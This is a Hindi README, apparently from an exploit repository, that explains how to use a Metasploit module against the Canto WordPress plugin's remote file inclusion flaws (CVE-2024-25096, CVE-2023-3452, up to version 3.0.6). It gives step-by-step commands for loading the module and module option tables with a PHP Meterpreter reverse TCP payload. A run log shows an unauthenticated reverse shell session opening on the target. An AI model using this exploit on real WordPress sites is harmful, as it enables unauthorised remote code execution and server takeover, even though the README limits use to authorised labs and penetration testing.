
यह CVE-2024-25096 और CVE-2023-3452 के लिए एक metasploit exploit module है
यह एक्सप्लॉइट RFI भेद्यताओं CVE-2024-25096 और CVE-2023-3452 का एक proof-of-work एक्सप्लॉइट है, जो हमलावर को लक्ष्य पर एक इंटरैक्टिव रिमोट शेल सत्र स्थापित करने की अनुमति देता है।
CVE-2024-25096 abspath पैरामीटर का दुरुपयोग करता है, जो include_once स्टेटमेंट के माध्यम से रिमोट फ़ाइल समावेशन की अनुमति देता है। CVE-2023-3452 की प्रक्रिया समान है, सिवाय इसके कि “wp_abspath” पैरामीटर requiere_once स्टेटमेंट के माध्यम से रिमोट फ़ाइल समावेशन की अनुमति देता है। यह हमलावर को लक्ष्य सर्वर पर बिना प्रमाणीकरण के कोड निष्पादित करने की अनुमति देता है।
हालाँकि भेद्यता डेटाबेस CVE-2023-3452 को संस्करण 3.0.4 तक प्रभावित करने वाली सूचीबद्ध करते हैं, परीक्षण ने पुष्टि की कि यह भेद्यता संस्करण 3.0.6 तक शोषण योग्य बनी हुई है। यह मुद्दा संस्करण 3.0.7 में पैच किया गया था, वही संस्करण जो CVE-2024-25096 को ठीक करता है।
लक्ष्य के भेद्य होने के लिए निम्नलिखित शर्तें आवश्यक हैं:
allow_url_include=On इस रिपॉजिटरी को क्लोन करें और canto प्लगइन डाउनलोड करें।
ध्यान दें कि यदि आप Canto का पुराना संस्करण डाउनलोड करना चाहते हैं, तो बस लिंक कॉपी करें और लिंक में संस्करण संख्या को अपने पसंदीदा संस्करण से बदल दें।
कंटेनर (docker-compose.yaml) को podman-compose up कमांड से प्रारंभ करें।
अपनी पसंद के ब्राउज़र में http://localhost:8889/wp-admin/install.php खोलें और एक WordPress खाता सेट अप करें।

लॉग इन करने के बाद, आप Plugins -> Add new plugins -> Plugin Upload टैब के अंतर्गत canto ज़िप फ़ाइल का चयन करके इंस्टॉल कर सकते हैं।

एक्सप्लॉइट (rce_exploit_cve_2024_25096.rb) को Metasploit मॉड्यूल फ़ोल्डर में जोड़ें।
Metasploit प्रारंभ करें (msfconsole) और Metasploit को रीलोड करें (reload_all)।
पेलोड चुनें।
cp explit/wordpress_canto_plugin_file_include_rce.rb ~/.msf4/modules/exploits/
msfconsole
reload_all
search rce_exploit_cve_2024_25096
use 0
आवश्यक वेरिएबल्स के मान सेट करें।
Module options (exploit/rce_exploit_cve_2024_25096):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, http, socks5h
RHOSTS 127.0.0.1 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8889 yes Port
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false yes Use SSL
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETFILE get.php yes Vulnerable PHP file
TARGETURI /wp-content/plugins/canto yes Path to cantos root directory
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.178.58 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 WordPress Plugin <= 3.0.6
View the full module info with the info, or info -d command
एक्सप्लॉइट चलाएँ और सर्वोत्तम की आशा करें ;)
[msf](Jobs:0 Agents:0) exploit(rce_exploit_cve_2024_25096) >> run
[*] Started reverse TCP handler on 192.168.178.58:4444
[*] Starting HTTP server...
[*] Using URL: http://192.168.178.58:8080/14Gs3AAu8j4
[*] Triggering RFI...
[*] Sending admin.php payload
[*] Sending stage (42137 bytes) to 192.168.178.58
[*] Meterpreter session 2 opened (192.168.178.58:4444 -> 192.168.178.58:54310) at 2026-03-01 20:15:23 +0100
[*] Server stopped.
(Meterpreter 2)(/var/www/html/wp-content/plugins/canto/includes/lib) >
यह प्रोजेक्ट केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान किया गया है।
लेखक अवैध गतिविधियों को प्रोत्साहित या समर्थन नहीं करता है। बिना अनुमति के सिस्टम पर हमला करने के लिए इस कोड का कोई भी उपयोग सख्त वर्जित है।
लेखक इस सॉफ़्टवेयर के कारण होने वाले किसी भी दुरुपयोग या क्षति के लिए जिम्मेदार नहीं है। उपयोगकर्ता यह सुनिश्चित करने के लिए जिम्मेदार हैं कि वे सभी लागू कानूनों और विनियमों का अनुपालन करें।
इस कोड का उपयोग केवल उन वातावरणों में करें जहाँ आपके पास स्पष्ट अनुमति हो, जैसे लैब वातावरण, पेनेट्रेशन टेस्टिंग कार्य, या सुरक्षा अनुसंधान।